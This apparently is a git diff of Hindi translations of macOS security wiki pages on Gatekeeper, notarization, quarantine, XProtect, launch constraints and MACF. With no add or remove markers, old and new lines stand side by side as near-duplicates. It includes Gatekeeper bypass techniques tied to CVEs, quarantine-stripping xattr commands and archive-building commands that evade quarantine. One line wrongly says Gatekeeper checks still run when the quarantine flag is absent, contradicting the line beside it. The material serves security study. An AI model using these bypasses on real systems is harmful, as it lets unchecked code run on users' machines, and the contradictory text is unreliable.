यदि सॉफ़्टवेयर इस निरीक्षण को बिना किसी चिंता के पास कर लेता है, तो Notary Service एक नोटरीकरण टिकट उत्पन्न करती है। डेवलपर को फिर **इस टिकट को अपने सॉफ़्टवेयर से संलग्न करना आवश्यक है**, जिसे 'स्टेपलिंग' के रूप में जाना जाता है। इसके अलावा, नोटरीकरण टिकट को ऑनलाइन भी प्रकाशित किया जाता है जहाँ Gatekeeper, Apple की सुरक्षा तकनीक, इसे एक्सेस कर सकती है।
यदि सॉफ़्टवेयर इस निरीक्षण को बिना किसी चिंता के **पास** कर लेता है, तो नोटरी सेवा एक नोटरीकरण टिकट उत्पन्न करती है। फिर डेवलपर को **इस टिकट को अपने सॉफ़्टवेयर से संलग्न करना आवश्यक है**, जिसे 'स्टेपलिंग' के रूप में जाना जाता है। इसके अलावा, नोटरीकरण टिकट को ऑनलाइन भी प्रकाशित किया जाता है जहाँ गेटकीपर, Apple की सुरक्षा तकनीक, इसे एक्सेस कर सकता है।
उपयोगकर्ता द्वारा सॉफ़्टवेयर की पहली स्थापना या निष्पादन पर, नोटरीकरण टिकट की उपस्थिति - चाहे वह निष्पादन योग्य के साथ स्टेपल किया गया हो या ऑनलाइन पाया गया हो - **Gatekeeper को सूचित करती है कि सॉफ़्टवेयर को Apple द्वारा नोटरीकरण किया गया है**। परिणामस्वरूप, Gatekeeper प्रारंभिक लॉन्च संवाद में एक वर्णनात्मक संदेश प्रदर्शित करता है, जो यह दर्शाता है कि सॉफ़्टवेयर को Apple द्वारा हानिकारक सामग्री के लिए जांचा गया है। यह प्रक्रिया उपयोगकर्ताओं के लिए उस सॉफ़्टवेयर की सुरक्षा में विश्वास को बढ़ाती है जिसे वे अपने सिस्टम पर स्थापित या चलाते हैं।
उपयोगकर्ता के पहले सॉफ़्टवेयर के इंस्टॉलेशन या निष्पादन पर, नोटरीकरण टिकट की उपस्थिति - चाहे वह निष्पादन योग्य के साथ स्टेपल किया गया हो या ऑनलाइन पाया गया हो - **गेटकीपर को सूचित करती है कि सॉफ़्टवेयर को Apple द्वारा नोटरीकरण किया गया है**। परिणामस्वरूप, गेटकीपर प्रारंभिक लॉन्च संवाद में एक वर्णनात्मक संदेश प्रदर्शित करता है, जो यह संकेत करता है कि सॉफ़्टवेयर ने Apple द्वारा दुष्ट सामग्री के लिए जांच की है। यह प्रक्रिया उपयोगकर्ताओं के लिए उस सॉफ़्टवेयर की सुरक्षा में विश्वास को बढ़ाती है जिसे वे अपने सिस्टम पर इंस्टॉल या चलाते हैं।
### spctl & syspolicyd
> [!CAUTION]
> ध्यान दें कि Sequoia संस्करण से, **`spctl`** अब Gatekeeper कॉन्फ़िगरेशन को संशोधित करने की अनुमति नहीं देता।
> ध्यान दें कि सेकोइया संस्करण से, **`spctl`** अब गेटकीपर कॉन्फ़िगरेशन को संशोधित करने की अनुमति नहीं देता।
**`spctl`** CLI उपकरण है जो Gatekeeper के साथ बातचीत करने और उसे सूचीबद्ध करने के लिए है (XPC संदेशों के माध्यम से `syspolicyd` डेमन के साथ)। उदाहरण के लिए, आप देख सकते हैं कि GateKeeper की **स्थिति** क्या है:
**`spctl`** गेटकीपर के साथ बातचीत करने और उसे सूचीबद्ध करने के लिए CLI उपकरण है (जो `syspolicyd` डेमन के माध्यम से XPC संदेशों के साथ है)। उदाहरण के लिए, गेटकीपर की **स्थिति** देखने के लिए:
```bash
# Check the status
spctl --status
@ -68,7 +68,7 @@ GateKeeper यह जांचेगा कि **प्राथमिकता
<figure><img src="../../../images/image (1150).png" alt=""><figcaption></figcaption></figure>
**`syspolicyd`** मुख्य डेमन है जो Gatekeeper को लागू करने के लिए जिम्मेदार है। यह `/var/db/SystemPolicy` में स्थित एक डेटाबेस बनाए रखता है और आप [यहाँ डेटाबेस का समर्थन करने के लिए कोड](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/policydb.cpp) और [यहाँ SQL टेम्पलेट](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/syspolicy.sql) पा सकते हैं। ध्यान दें कि डेटाबेस SIP द्वारा अनियंत्रित है और इसे रूट द्वारा लिखा जा सकता है और डेटाबेस `/var/db/.SystemPolicy-default` का उपयोग एक मूल बैकअप के रूप में किया जाता है यदि अन्य भ्रष्ट हो जाता है
**`syspolicyd`** मुख्य डेमन है जो Gatekeeper को लागू करने के लिए जिम्मेदार है। यह `/var/db/SystemPolicy` में स्थित एक डेटाबेस बनाए रखता है और आप [डेटाबेस का कोड यहाँ](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/policydb.cpp) और [SQL टेम्पलेट यहाँ](https://opensource.apple.com/source/Security/Security-58286.240.4/OSX/libsecurity_codesigning/lib/syspolicy.sql) पा सकते हैं। ध्यान दें कि डेटाबेस SIP द्वारा अनियंत्रित है और इसे रूट द्वारा लिखा जा सकता है और डेटाबेस `/var/db/.SystemPolicy-default` का उपयोग एक मूल बैकअप के रूप में किया जाता है यदि अन्य भ्रष्ट हो जा
इसके अलावा, बंडल **`/var/db/gke.bundle`** और **`/var/db/gkopaque.bundle`** में नियमों के साथ फ़ाइलें होती हैं जो डेटाबेस में डाली जाती हैं। आप रूट के रूप में इस डेटाबेस की जांच कर सकते हैं:
```bash
@ -84,9 +84,9 @@ anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
[...]
```
**`syspolicyd`** एक XPC सर्वर को विभिन्न ऑपरेशनों के साथ उजागर करता है जैसे कि `assess`, `update`, `record` और `cancel`, जो **`Security.framework` के `SecAssessment*`** APIs का उपयोग करके भी पहुचा जा सकता है और **`xpctl`** वास्तव में **`syspolicyd`** से XPC के माध्यम से बात करता है।
**`syspolicyd`** एक XPC सर्वर को विभिन्न ऑपरेशनों के साथ उजागर करता है जैसे कि `assess`, `update`, `record` और `cancel`, जो **`Security.framework` के `SecAssessment*`** APIs का उपयोग करके भी पहुचा जा सकता है और **`xpctl`** वास्तव में **`syspolicyd`** से XPC के माध्यम से बात करता है।
ध्यान दें कि पहला नियम "**App Store**" पर समाप्त होता है और दूसरा "**Developer ID**" पर, और पिछले चित्र में यह **App Store और पहचाने गए डेवलपर्स से ऐप्स को निष्पादित करने के लिए सक्षम था**।\
ध्यान दें कि पहला नियम "**App Store**" में समाप्त होता है और दूसरा "**Developer ID**" में, और पिछले चित्र में यह **App Store और पहचाने गए डेवलपर्स से ऐप्स को निष्पादित करने के लिए सक्षम था**।\
यदि आप उस सेटिंग को App Store में **संशोधित** करते हैं, तो "**Notarized Developer ID" नियम गायब हो जाएंगे**।
यहां **प्रकार GKE** के हजारों नियम भी हैं:
@ -149,16 +149,16 @@ spctl --assess -v /Applications/App.app
**क्वारंटाइन फ्लैग की उपस्थिति macOS के गेटकीपर सुरक्षा फ़ीचर को संकेत देती है जब कोई उपयोगकर्ता फ़ाइल को निष्पादित करने का प्रयास करता है**।
यदि **क्वारंटाइन फ्लैग मौजूद नहीं है** (जैसे कुछ BitTorrent क्लाइंट के माध्यम से डाउनलोड की गई फ़ाइलों के साथ), तो गेटकीपर के **चेक नहीं किए जा सकते**। इसलिए, उपयोगकर्ताओं को कम सुरक्षित या अज्ञात स्रोतों से डाउनलोड की गई फ़ाइलों को खोलते समय सावधानी बरतनी चाहिए।
यदि **क्वारंटाइन फ्लैग मौजूद नहीं है** (जैसे कुछ BitTorrent क्लाइंट के माध्यम से डाउनलोड की गई फ़ाइलों के साथ), तो गेटकीपर के **चेक किए जा सकते हैं**। इसलिए, उपयोगकर्ताओं को कम सुरक्षित या अज्ञात स्रोतों से डाउनलोड की गई फ़ाइलों को खोलते समय सावधानी बरतनी चाहिए।
> [!NOTE] > **कोड हस्ताक्षरों की** **वैधता** की **जांच** एक **संसाधन-गहन** प्रक्रिया है जिसमें कोड और इसके सभी बंडल किए गए संसाधनों के क्रिप्टोग्राफ़िक **हैश** उत्पन्न करना शामिल है। इसके अलावा, प्रमाणपत्र की वैधता की जांच करने के लिए Apple के सर्वरों पर **ऑनलाइन जांच** करना आवश्यक है यह देखने के लिए कि क्या इसे जारी किए जाने के बाद रद्द किया गया है। इन कारणों से, एक पूर्ण कोड हस्ताक्षर और नोटरीकरण जांच **हर बार ऐप लॉन्च होने पर चलाना व्यावहारिक नहीं है**
> [!NOTE] > **कोड हस्ताक्षरों की** **वैधता** की **जांच** एक **संसाधन-गहन** प्रक्रिया है जिसमें कोड और इसके सभी बंडल किए गए संसाधनों के क्रिप्टोग्राफ़िक **हैश** उत्पन्न करना शामिल है। इसके अलावा, प्रमाणपत्र की वैधता की जांच करने के लिए Apple के सर्वरों पर **ऑनलाइन जांच** करना आवश्यक है यह देखने के लिए कि क्या इसे जारी किए जाने के बाद रद्द कर दिया गया है। इन कारणों से, एक पूर्ण कोड हस्ताक्षर और नोटरीकरण जांच **हर बार ऐप लॉन्च होने पर चलाना व्यावहारिक नहीं है**
>
> इसलिए, ये जांचें **केवल क्वारंटाइन विशेषता वाले ऐप्स को निष्पादित करते समय चलायी जाती हैं।**
> इसलिए, ये चेक **केवल क्वारंटाइन विशेषता वाले ऐप्स को निष्पादित करते समय चलाए जाते हैं।**
> [!WARNING]
> यह विशेषता **फ़ाइल बनाने/डाउनलोड करने वाले ऐप्लिकेशन द्वारा सेट की जानी चाहिए**
>
> हालाँकि, जो फ़ाइलें सैंडबॉक्स की गई हैं, वे हर फ़ाइल पर यह विशेषता सेट करेंगी जो वे बनात हैं। और गैर-सैंडबॉक्स ऐप्स इसे स्वयं सेट कर सकते हैं, या **Info.plist** में [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) कुंजी निर्दिष्ट कर सकते हैं, जो सिस्टम को फ़ाइलों पर `com.apple.quarantine` विस्तारित विशेषता सेट करने के लिए बनाएगी,
> हालाँकि, जो फ़ाइलें सैंडबॉक्स की गई हैं, वे हर फ़ाइल पर यह विशेषता सेट करेंगी जो वे बनात हैं। और गैर-सैंडबॉक्स ऐप्स इसे स्वयं सेट कर सकते हैं, या **Info.plist** में [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) कुंजी निर्दिष्ट कर सकते हैं, जो सिस्टम को बनाई गई फ़ाइलों पर `com.apple.quarantine` विस्तारित विशेषता सेट करने के लिए मजबूर करेगा,
इसके अलावा, **`qtn_proc_apply_to_self`** को कॉल करने वाली प्रक्रिया द्वारा बनाई गई सभी फ़ाइलें क्वारंटाइन की जाती हैं। या API **`qtn_file_apply_to_path`** एक निर्दिष्ट फ़ाइल पथ पर क्वारंटाइन विशेषता जोड़ता है।
@ -269,13 +269,13 @@ find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine
```bash
find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"
```
क्वारंटाइन जानकारी भी एक केंद्रीय डेटाबेस में संग्रहीत होती है जिसे LaunchServices द्वारा प्रबंधित किया जाता है **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`** जो GUI को फ़ाइल के मूल के बारे में डेटा प्राप्त करने की अनुमति देता है। इसके अलावा, इसे उन अनुप्रयोगों द्वारा अधिलेखित किया जा सकता है जो इसके मूल को छिपाने में रुचि रखते हैं। इसके अलावा, यह LaunchServices APIS से किया जा सकता है।
Quarantine जानकारी भी एक केंद्रीय डेटाबेस में संग्रहीत होती है जिसे LaunchServices द्वारा प्रबंधित किया जाता है **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`** जो GUI को फ़ाइल के मूल के बारे में डेटा प्राप्त करने की अनुमति देता है। इसके अलावा, इसे उन अनुप्रयोगों द्वारा अधिलेखित किया जा सकता है जो इसके मूल को छिपाने में रुचि रखते हैं। इसके अलावा, यह LaunchServices APIS से किया जा सकता है।
#### **libquarantine.dylb**
यह पुस्तकालय कई कार्यों को निर्यात करता है जो विस्तारित विशेषता क्षेत्रों को संशोधित करने की अनुमति देते हैं।
`qtn_file_*` APIs फ़ाइल क्वारंटाइन नीतियों से संबंधित हैं, `qtn_proc_*` APIs प्रक्रियाओं (प्रक्रिया द्वारा बनाई गई फ़ाइलें) पर लागू होते हैं। निर्यातित नहीं किए गए `__qtn_syscall_quarantine*` कार्य वे हैं जो नीतियों को लागू करते हैं जो "Quarantine" को पहले तर्क के रूप में `mac_syscall` को कॉल करते हैं जो अनुरोधों को `Quarantine.kext` पर भेजता है।
`qtn_file_*` APIs फ़ाइल क्वारंटाइन नीतियों से संबंधित हैं, `qtn_proc_*` APIs प्रक्रियाओं (प्रक्रिया द्वारा बनाई गई फ़ाइलें) पर लागू होते हैं। निर्यातित नहीं किए गए `__qtn_syscall_quarantine*` कार्य वे हैं जो नीतियों को लागू करते हैं जो `mac_syscall` को "Quarantine" के पहले तर्क के रूप में कॉल करते हैं जो अनुरोधों को `Quarantine.kext` पर भेजता है।
#### **Quarantine.kext**
@ -290,11 +290,11 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri
### XProtect
XProtect macOS में एक अंतर्निहित **एंटी-मैलवेयर** सुविधा है। XProtect **किसी भी एप्लिकेशन की पहली बार लॉन्च या संशोधित होने पर इसकी ज्ञात मैलवेयर और असुरक्षित फ़ाइल प्रकारों के डेटाबेस के खिलाफ जांच करता है**। जब आप कुछ ऐप्स, जैसे Safari, Mail, या Messages के माध्यम से फ़ाइल डाउनलोड करते हैं, तो XProtect स्वचालित रूप से फ़ाइल को स्कैन करता है। यदि यह अपने डेटाबेस में किसी ज्ञात मैलवेयर से मेल खाता है, तो XProtect **फ़ाइल को चलने से रोक देगा** और आपको खतरे के बारे में सूचित करेगा।
XProtect macOS में एक अंतर्निहित **एंटी-मैलवेयर** सुविधा है। XProtect **किसी भी अनुप्रयोग की जांच करता है जब इसे पहली बार लॉन्च या संशोधित किया जाता है** इसके ज्ञात मैलवेयर और असुरक्षित फ़ाइल प्रकारों के डेटाबेस के खिलाफ। जब आप कुछ ऐप्स, जैसे Safari, Mail, या Messages के माध्यम से फ़ाइल डाउनलोड करते हैं, तो XProtect स्वचालित रूप से फ़ाइल को स्कैन करता है। यदि यह अपने डेटाबेस में किसी ज्ञात मैलवेयर से मेल खाता है, तो XProtect **फ़ाइल को चलने से रोक देगा** और आपको खतरे के बारे में सूचित करेगा।
XProtect डेटाबेस को **नियमित रूप से** Apple द्वारा नए मैलवेयर परिभाषाओं के साथ अपडेट किया जाता है, और ये अपडेट स्वचालित रूप से आपके Mac पर डाउनलोड और स्थापित होते हैं। यह सुनिश्चित करता है कि XProtect हमेशा नवीनतम ज्ञात खतरों के साथ अद्यतित है।
हालांकि, यह ध्यान देने योग्य है कि **XProtect एक पूर्ण-विशेषता वाला एंटीवायरस समाधान नहीं है**। यह केवल ज्ञात खतरों की एक विशिष्ट सूची की जांच करता है और अधिकांश एंटीवायरस सॉफ़्टवेयर की तरह ऑन-एक्सेस स्कैनिंग नहीं करता है।
हालांकि, यह ध्यान देने योग्य है कि **XProtect एक पूर्ण विशेषताओं वाला एंटीवायरस समाधान नहीं है**। यह केवल ज्ञात खतरों की एक विशिष्ट सूची की जांच करता है और अधिकांश एंटीवायरस सॉफ़्टवेयर की तरह ऑन-एक्सेस स्कैनिंग नहीं करता है।
आप नवीनतम XProtect अपडेट के बारे में जानकारी प्राप्त कर सकते हैं:
```bash
@ -320,7 +320,7 @@ XProtect **/Library/Apple/System/Library/CoreServices/XProtect.bundle** पर
## Gatekeeper Bypasses
Gatekeeper को बायपास करने का कोई भी तरीका (उपयोगकर्ता को कुछ डाउनलोड करने और निष्पादित करने के लिए प्रबंधित करना जब Gatekeeper इसे अस्वीकार करना चाहिए) macOS में एक भेद्यता माना जाता है। ये कुछ CVEs हैं जो तकनीकों को सौंपे गए हैं जिन्होंने अतीत में Gatekeeper को बायपास करने की अनुमति दी:
Gatekeeper को बायपास करने का कोई भी तरीका (उपयोगकर्ता को कुछ डाउनलोड करने और निष्पादित करने के लिए प्रबंधित करना जब Gatekeeper इसे अस्वीकार करना चाहिए) macOS में एक भेद्यता माना जाता है। ये कुछ CVEs हैं जो तकनीकों को असाइन किए गए हैं जिन्होंने अतीत में Gatekeeper को बायपास करने की अनुमति दी:
### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)
@ -334,7 +334,7 @@ Gatekeeper को बायपास करने का कोई भी तर
इसलिए, आप `application.app/Contents/MacOS/Automator\ Application\ Stub` को **सिस्टम के अंदर एक अन्य Automator Application Stub की ओर एक प्रतीकात्मक लिंक के साथ इंगित कर सकते हैं** और यह `document.wflow` (आपका स्क्रिप्ट) के अंदर जो है उसे **Gatekeeper को ट्रिगर किए बिना निष्पादित करेगा** क्योंकि वास्तविक निष्पादनीय में क्वारंटाइन xattr नहीं है।
उदाहरण अपेक्षित स्थान: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
उदाहरण के लिए अपेक्षित स्थान: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
अधिक जानकारी के लिए [**मूल रिपोर्ट**](https://ronmasas.com/posts/bypass-macos-gatekeeper) की जांच करें।
@ -348,7 +348,7 @@ Check the [**original report**](https://www.jamf.com/blog/jamf-threat-labs-safar
### [CVE-2022-32910](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32910)
यहां तक कि यदि घटक भिन्न हैं, तो इस सुरक्षा कमजोरी का शोषण पिछले वाले के समान है। इस मामले में हम **`application.app/Contents`** से एक Apple Archive बनाएंगे ताकि **`application.app`** को **Archive Utility** द्वारा अनजिप करते समय क्वारंटाइन विशेषता न मिले।
यहां तक कि यदि घटक भिन्न हैं, तो इस सुरक्षा कमजोरी का शोषण पिछले वाले के समान है। इस मामले में, हम **`application.app/Contents`** से एक Apple Archive बनाएंगे ताकि **`application.app`** को **Archive Utility** द्वारा अनजिप करते समय क्वारंटाइन विशेषता न मिले।
```bash
aa archive -d test.app/Contents -o test.app.aar
```
@ -414,7 +414,7 @@ ln -s ._app.dmg s/app/app.dmg
echo "[+] compressing files"
aa archive -d s/ -o app.aar
```
### uchg (इस [बातचीत](https://codeblue.jp/2023/result/pdf/cb23-bypassing-macos-security-and-privacy-mechanisms-from-gatekeeper-to-system-integrity-protection-by-koh-nakagawa.pdf) से)
### uchg (from this [talk](https://codeblue.jp/2023/result/pdf/cb23-bypassing-macos-security-and-privacy-mechanisms-from-gatekeeper-to-system-integrity-protection-by-koh-nakagawa.pdf))
- एक ऐप वाला डायरेक्टरी बनाएं।
- ऐप में uchg जोड़ें।
@ -423,7 +423,7 @@ aa archive -d s/ -o app.aar
- पीड़ित tar.gz फ़ाइल खोलता है और ऐप चलाता है।
- Gatekeeper ऐप की जांच नहीं करता है।
### क्वारंटाइन xattr को रोकें
### Prevent Quarantine xattr
एक ".app" बंडल में यदि क्वारंटाइन xattr जोड़ा नहीं गया है, तो इसे निष्पादित करते समय **Gatekeeper सक्रिय नहीं होगा**

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
View File

@ -6,7 +6,7 @@
macOS में लॉन्च प्रतिबंध सुरक्षा को बढ़ाने के लिए पेश किए गए थे **यह विनियमित करके कि एक प्रक्रिया कैसे, कौन और कहाँ से शुरू की जा सकती है**। macOS Ventura में शुरू किए गए, ये एक ढांचा प्रदान करते हैं जो **प्रत्येक सिस्टम बाइनरी को विशिष्ट प्रतिबंध श्रेणियों में वर्गीकृत करता है**, जो **ट्रस्ट कैश** के भीतर परिभाषित हैं, जो सिस्टम बाइनरी और उनके संबंधित हैश का एक सूची है। ये प्रतिबंध सिस्टम के भीतर हर निष्पादन योग्य बाइनरी पर लागू होते हैं, जिसमें **विशिष्ट बाइनरी को लॉन्च करने के लिए आवश्यकताओं** को परिभाषित करने वाले **नियमों** का एक सेट शामिल होता है। नियमों में स्वयं प्रतिबंध शामिल होते हैं जिन्हें एक बाइनरी को संतुष्ट करना होता है, माता-पिता के प्रतिबंध जो इसके माता-पिता की प्रक्रिया द्वारा पूरा किए जाने की आवश्यकता होती है, और जिम्मेदार प्रतिबंध जो अन्य संबंधित संस्थाओं द्वारा पालन किए जाने चाहिए।
यह तंत्र तीसरे पक्ष के ऐप्स तक **पर्यावरण प्रतिबंधों** के माध्यम से विस्तारित होता है, जो macOS Sonoma से शुरू होता है, जिससे डेवलपर्स को अपने ऐप्स की सुरक्षा करने की अनुमति मिलती है, जो **पर्यावरण प्रतिबंधों के लिए कुंजी और मानों का एक सेट निर्दिष्ट करते हैं।**
यह तंत्र तीसरे पक्ष के ऐप्स तक **पर्यावरण प्रतिबंधों** के माध्यम से विस्तारित होता है, जो macOS Sonoma से शुरू होता है, जिससे डेवलपर्स अपने ऐप्स की सुरक्षा कर सकते हैं **पर्यावरण प्रतिबंधों के लिए कुंजी और मानों का एक सेट निर्दिष्ट करके।**
आप **लॉन्च वातावरण और पुस्तकालय प्रतिबंधों** को प्रतिबंध शब्दकोशों में परिभाषित करते हैं जिन्हें आप या तो **`launchd` प्रॉपर्टी लिस्ट फ़ाइलों** में सहेजते हैं, या **अलग प्रॉपर्टी लिस्ट** फ़ाइलों में जो आप कोड साइनिंग में उपयोग करते हैं।
@ -47,7 +47,7 @@ Category 1:
Self Constraint: (on-authorized-authapfs-volume || on-system-volume) && launch-type == 1 && validation-category == 1
Parent Constraint: is-init-proc
```
- `(on-authorized-authapfs-volume || on-system-volume)`: सिस्टम या क्रिप्टेक्स वॉल्यूम में होना चाहिए।
- `(on-authorized-authapfs-volume || on-system-volume)`: सिस्टम या क्रिप्टेक्सेस वॉल्यूम में होना चाहिए।
- `launch-type == 1`: एक सिस्टम सेवा होनी चाहिए (LaunchDaemons में plist)।
- `validation-category == 1`: एक ऑपरेटिंग सिस्टम निष्पादन योग्य।
- `is-init-proc`: Launchd
@ -58,7 +58,7 @@ Parent Constraint: is-init-proc
## पर्यावरण प्रतिबंध
ये **तीसरे पक्ष के अनुप्रयोगों** में सेट किए गए लॉन्च प्रतिबंध हैं। डेवलपर अपने अनुप्रयोग में **तथ्यों** और **तार्किक ऑपरेटरों का चयन** कर सकता है ताकि स्वयं तक पहुंच को प्रतिबंधित किया जा सके।
ये **तीसरे पक्ष के अनुप्रयोगों** में सेट किए गए लॉन्च प्रतिबंध हैं। डेवलपर अपने अनुप्रयोग में **तथ्यों** और **तर्कात्मक ऑपरेटरों का चयन** कर सकता है ताकि स्वयं तक पहुंच को प्रतिबंधित किया जा सके।
एक अनुप्रयोग के पर्यावरण प्रतिबंधों को सूचीबद्ध करना संभव है:
```bash
@ -75,7 +75,7 @@ In **macOS** में कुछ ट्रस्ट कैश हैं:
और iOS में यह **`/usr/standalone/firmware/FUD/StaticTrustCache.img4`** में है।
> [!WARNING]
> Apple Silicon डिवाइस पर चलने वाले macOS में, यदि कोई Apple द्वारा साइन किया गया बाइनरी ट्रस्ट कैश में नहीं है, तो AMFI इसे लोड करने से मना कर देगा।
> Apple Silicon उपकरणों पर चलने वाले macOS पर, यदि कोई Apple द्वारा साइन किया गया बाइनरी ट्रस्ट कैश में नहीं है, तो AMFI इसे लोड करने से इनकार कर देगा।
### Enumerating Trust Caches
@ -135,13 +135,13 @@ uint8_t reserved0;
```
फिर, आप डेटा निकालने के लिए [**इस स्क्रिप्ट**](https://gist.github.com/xpn/66dc3597acd48a4c31f5f77c3cc62f30) का उपयोग कर सकते हैं।
उस डेटा से आप उन ऐप्स की जांच कर सकते हैं जिनका **launch constraints मान `0`** है, जो वे हैं जो सीमित नहीं हैं ([**यहा जांचें**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056) कि प्रत्येक मान क्या है)।
उस डेटा से आप उन ऐप्स की जांच कर सकते हैं जिनका **launch constraints मान `0`** है, जो वे हैं जो सीमित नहीं हैं ([**यहा जांचें**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056) कि प्रत्येक मान क्या है)।
## हमले की रोकथाम
Launch Constraints कई पुराने हमलों को **यह सुनिश्चित करके रोकते हैं कि प्रक्रिया अप्रत्याशित परिस्थितियों में निष्पादित नहीं होगी:** उदाहरण के लिए अप्रत्याशित स्थानों से या अप्रत्याशित माता-पिता प्रक्रिया द्वारा बुलाए जाने पर (यदि केवल launchd इसे लॉन्च करना चाहिए)
इसके अलावा, Launch Constraints **डाउनग्रेड हमलों को भी रोकते हैं।**
इसके अलावा, Launch Constraints भी **डाउनग्रेड हमलों को रोकते हैं।**
हालांकि, वे **सामान्य XPC** दुरुपयोग, **Electron** कोड इंजेक्शन या **dylib इंजेक्शन** को बिना लाइब्रेरी सत्यापन के रोकते नहीं हैं (जब तक कि उन टीम आईडी को नहीं जाना जाता जो लाइब्रेरी लोड कर सकते हैं)।
@ -150,7 +150,7 @@ Launch Constraints कई पुराने हमलों को **यह स
Sonoma रिलीज़ में, एक महत्वपूर्ण बिंदु डेमन XPC सेवा की **जिम्मेदारी कॉन्फ़िगरेशन** है। XPC सेवा अपनी जिम्मेदारी के लिए उत्तरदायी है, जबकि कनेक्टिंग क्लाइंट जिम्मेदार नहीं है। यह फीडबैक रिपोर्ट FB13206884 में दस्तावेजित है। यह सेटअप दोषपूर्ण लग सकता है, क्योंकि यह XPC सेवा के साथ कुछ इंटरैक्शन की अनुमति देता है:
- **XPC सेवा लॉन्च करना**: यदि इसे एक बग माना जाए, तो यह सेटअप हमलावर कोड के माध्यम से XPC सेवा को प्रारंभ करने की अनुमति नहीं देता है।
- **सक्रिय सेवा से कनेक्ट करना**: यदि XPC सेवा पहले से चल रही है (संभवतः इसके मूल एप्लिकेशन द्वारा सक्रिय), तो इससे कनेक्ट करने में कोई बाधा नहीं है।
- **सक्रिय सेवा से कनेक्ट करना**: यदि XPC सेवा पहले से चल रही है (संभवतः इसके मूल एप्लिकेशन द्वारा सक्रिय की गई), तो इससे कनेक्ट करने में कोई बाधा नहीं है।
XPC सेवा पर प्रतिबंध लागू करना **संभावित हमलों के लिए खिड़की को संकीर्ण करके** फायदेमंद हो सकता है, लेकिन यह प्राथमिक चिंता को संबोधित नहीं करता है। XPC सेवा की सुरक्षा सुनिश्चित करने के लिए **कनेक्टिंग क्लाइंट को प्रभावी ढंग से मान्य करना** आवश्यक है। यह सेवा की सुरक्षा को मजबूत करने का एकमात्र तरीका है। इसके अलावा, यह ध्यान देने योग्य है कि उल्लेखित जिम्मेदारी कॉन्फ़िगरेशन वर्तमान में कार्यात्मक है, जो कि इच्छित डिज़ाइन के साथ मेल नहीं खा सकता है।

58
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
View File

@ -4,7 +4,7 @@
## Basic Information
**MACF** का मतलब है **Mandatory Access Control Framework**, जो एक सुरक्षा प्रणाली है जो ऑपरेटिंग सिस्टम में निर्मित है ताकि आपके कंप्यूटर की सुरक्षा में मदद मिल सके। यह **कठोर नियम निर्धारित करके काम करता है कि कौन या क्या सिस्टम के कुछ हिस्सों, जैसे फ़ाइलें, अनुप्रयोग और सिस्टम संसाधन, तक पहुँच सकता है** इन नियमों को स्वचालित रूप से लागू करके, MACF सुनिश्चित करता है कि केवल अधिकृत उपयोगकर्ता और प्रक्रियाएँ विशिष्ट क्रियाएँ कर सकें, जिससे अनधिकृत पहुँच या दुर्भावनापूर्ण गतिविधियों का जोखिम कम हो जाता है।
**MACF** का मतलब है **Mandatory Access Control Framework**, जो एक सुरक्षा प्रणाली है जो ऑपरेटिंग सिस्टम में निर्मित है ताकि आपके कंप्यूटर की सुरक्षा में मदद मिल सके। यह **कठोर नियम निर्धारित करके काम करता है कि कौन या क्या सिस्टम के कुछ हिस्सों, जैसे फ़ाइलें, अनुप्रयोग और सिस्टम संसाधनों, तक पहुँच सकता है** इन नियमों को स्वचालित रूप से लागू करके, MACF सुनिश्चित करता है कि केवल अधिकृत उपयोगकर्ता और प्रक्रियाएँ विशिष्ट क्रियाएँ कर सकें, जिससे अनधिकृत पहुँच या दुर्भावनापूर्ण गतिविधियों का जोखिम कम होता है।
ध्यान दें कि MACF वास्तव में कोई निर्णय नहीं लेता क्योंकि यह केवल **क्रियाओं को अवरोधित** करता है, यह निर्णय **नीति मॉड्यूल** (कर्नेल एक्सटेंशन) पर छोड़ देता है जिसे यह कॉल करता है जैसे `AppleMobileFileIntegrity.kext`, `Quarantine.kext`, `Sandbox.kext`, `TMSafetyNet.kext` और `mcxalr.kext`
@ -18,7 +18,7 @@
6. नीतियाँ संकेत करती हैं कि वे क्रिया की अनुमति देती हैं या अस्वीकार करती हैं
> [!CAUTION]
> Apple ही एकमात्र ऐसा है जो MAC Framework KPI का उपयोग कर सकता है।
> Apple एकमात्र ऐसा है जो MAC Framework KPI का उपयोग कर सकता है।
### Labels
@ -26,7 +26,7 @@ MACF **लेबल** का उपयोग करता है जिसे
## MACF Policies
एक MACF नीति **कुछ कर्नेल संचालन में लागू करने के लिए नियम और शर्तें परिभाषित करती है**।&#x20;
एक MACF नीति **कुछ कर्नेल संचालन में लागू करने के लिए नियम और शर्तें परिभाषित करती है।**
